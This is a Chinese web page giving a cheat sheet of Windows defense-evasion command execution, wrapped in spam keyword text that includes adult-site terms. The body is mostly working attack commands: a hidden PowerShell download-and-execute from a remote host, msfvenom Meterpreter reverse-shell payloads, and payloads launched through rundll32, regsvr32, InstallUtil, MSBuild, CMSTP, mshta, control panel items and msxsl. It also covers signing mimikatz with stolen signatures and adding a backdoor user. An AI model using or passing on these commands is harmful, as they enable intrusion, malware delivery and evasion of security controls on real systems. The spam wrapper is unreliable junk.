av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術文章
文章詳情頁

Windows命令執行防御規避總結

瀏覽:118日期:2022-11-12 13:56:43

今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

powershell

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))”“ /f

SIP

通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目標執行

rundll32.exe shell32.dll,Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目標執行

regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.編譯后門:

C:WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:Program Files (x86)Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs

2.靶機上運行:

InstallUtil.exe /U xxx.exe

3.msf監聽,得到反彈的shell:

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf監聽

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

運行

C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C:UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過AppLocker并啟動惡意腳本

Mshta.exe

Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

msf exploit(windows/misc/hta_server) 》 exploit

mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

攻擊者構造惡意的dll文件CPIApplet.dll

利用msf生成dll文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:usersadministratordesktopCPIApplet.cpl 執行命令

通過msxsl.exe調用惡意xml文件執行腳本

制作兩個文件

customers.xml

script.xsl

xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”http://mycompany.com/mynamespace“》

function xml(nodelist) {

var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

return nodelist.nextNode().xml;

}

開啟http服務

python3 -m http.server 80

遠程下載執行

msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl

標簽: Windows系統
相關文章:
主站蜘蛛池模板: 免费观看日韩精品 | 久久久新视频 | 午夜在线 | 99免费视频 | 亚洲成人在线免费 | 免费a级毛片在线播放 | 91精品一区二区三区久久久久久 | 国产乱码精品1区2区3区 | 精品区| av网址在线| 亚洲欧美一区二区三区国产精品 | 欧美亚洲国语精品一区二区 | 国产日韩欧美中文 | 亚洲成色777777在线观看影院 | 污书屋 | 中文字幕日韩在线 | 免费能直接在线观看黄的视频 | 欧美精品区| 久久中文字幕一区 | 日韩免费视频 | 亚洲视频欧美视频 | 欧美成人免费 | 中文一级片 | 日韩电影一区二区三区 | 天堂va在线观看 | 欧美高清一区 | 亚洲情侣视频 | 久久亚洲精品国产精品紫薇 | 久久精品国产久精国产 | 黄a免费网络 | av国产精品 | 国产精品久久久久久久久大全 | 国精日本亚洲欧州国产中文久久 | 在线欧美日韩 | 国产精品亚洲成在人线 | www国产亚洲精品久久网站 | 精品91视频| 亚洲视频一区二区三区四区 | 欧美一区二区三区在线视频 | 久久综合一区 | 中文一区二区 |